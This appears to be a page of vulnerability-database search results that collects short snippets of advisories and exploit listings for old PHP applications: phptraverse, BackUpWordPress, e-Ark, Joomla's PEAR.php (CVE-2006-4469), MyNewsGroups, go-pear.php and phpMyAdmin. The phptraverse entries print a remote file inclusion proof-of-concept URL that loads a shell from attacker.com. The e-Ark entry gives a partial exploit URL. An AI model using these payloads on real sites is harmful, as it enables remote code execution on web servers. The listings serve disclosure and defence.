Information disclosure

Rapid Leech 2.3-v42-svn322 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by classes/pear.php and certain other files...

phptraverse 0.8.0 - Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg phptraverse PoC : http://server/path/assets/plugins/mp3id/mp3id.php?GLOBALSBASE=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I Love U Full : /\ al...

phptraverse <= 0.8.0 Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ======================================================== phptraverse PoC : http://server/path/assets/plugins/mp3id/mp3id.php?GLOBALSBASE=http://attacker.com/shell.txt?cmd 0day.today 2018-04-13...

WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability

Exploit for unknown platform in category web applications ============================================================ WordPress Plugin BackUpWordPress = 0.4.2b RFI Vulnerability ============================================================ --------------------------------- Xmors Underground Team ...

e-Ark 1.0 (src/ark_inc.php) Remote File Include Vulnerability

No description provided by source. !/usr/bin/perl Portal Name : e-Ark project Remote File Inclusion Exploit Exploit: http://target/path/src/arkinc.php?cfgpearpath=http:// Vulnerable Code:requireonce $cfgpearpath . 'PEAR.php' ; Bug Found DeltahackingTEAM Code :Dr.Trojan&Dr.Pantagon Download...

Joomla!多个远程安全漏洞

Joomla!是一款开放源码的内容管理系统（CMS）。 Joomla!中存在多个跨站脚本和安全限制绕过漏洞： 1 mosMail和JosIsValidEmail函数中存在输入验证错误。 2 PEAR.php中存在安全漏洞。 3 globals.php没有包含在administrator/index.php中。 4 由于缺少defined 'VALIDMOS' 检查以及Admin "Upload Image"、Admin "Popups"和"comcontent"功能中的错误，导致存在不充分的访问控制检查。 5 dopdf功能以及处理emailform...

Joomla! < 1.0.11 Unspecified Remote Code Execution

The version of Joomla! installed on the remote host is affected by a remote code execution vulnerability in the includes/PEAR/PEAR.php script. An unauthenticated, remote attacker can exploit this to execute arbitrary code, subject to the privileges of the web server user ID. Note that successful...

CVE-2006-4469

Unspecified vulnerability in PEAR.php in Joomla! before 1.0.11 allows remote attackers to perform "remote execution," related to "Injection Flaws."...

CVE-2006-4469

Joomla! prior to version 1.0.11 is affected by a remote code execution vulnerability in includes/PEAR/PEAR.php. The issue enables unauthenticated remote attackers to execute arbitrary code due to injection flaws in PEAR.php, with exploitation depending on PHP settings (register_globals) and PHP v...

CVE-2006-4469

Unspecified vulnerability in PEAR.php in Joomla! before 1.0.11 allows remote attackers to perform "remote execution," related to "Injection Flaws."...

FreeBSD : joomla -- multiple vulnerabilities (0ab423e7-3822-11db-81e1-000e0c2e438a)

The Joomla development team reports multiple vulnerabilities within the joomla application. Joomla is vulnerable to the following vulnerabilities : - Improper validation of the mosMail function - Improper validation of the JosIsValidEmail function. - Remote code execution in PEAR.php - Zend Hash...

joomla -- multiple vulnerabilities

The Joomla development team reports multiple vulnerabilities within the joomla application. Joomla is vulnerable to the following vulnerabilities: Improper validation of the mosMail function Improper validation of the JosIsValidEmail function. Remote code execution in PEAR.php Zend Hash del key o...

MyNewsGroups 0.6b - &#039;myng_root&#039; Remote Inclusion

+-------------------------------------------------------------------- + + MyNewsGroups : v. 0.6b = Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: MyNewsGroups : v. 0.6b + Venedor ...........: http://mynewsgroups.sourceforge.n...

New PEAR / Apache2Triad Exploit

File: go-pear.php Affects: v0.2.2 May affect other versions Date: 6th January 2006 Issue Description: ==================================== A vulnerability exists within version 0.2.2 of go-pear.php, part of PHP's PEAR Package. The problem lies in the scripts capacity to utilize a proxy server. An...

Advisory 25/2005: phpMyAdmin Variables Overwrite Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: phpMyAdmin Variable Overwrite Vulnerability Release Date: 2005/12/07 Last Modified: 2005/12/07 Author: Stefan Esser [email protected] Application: phpMyAdmin 2.7.0-rc1...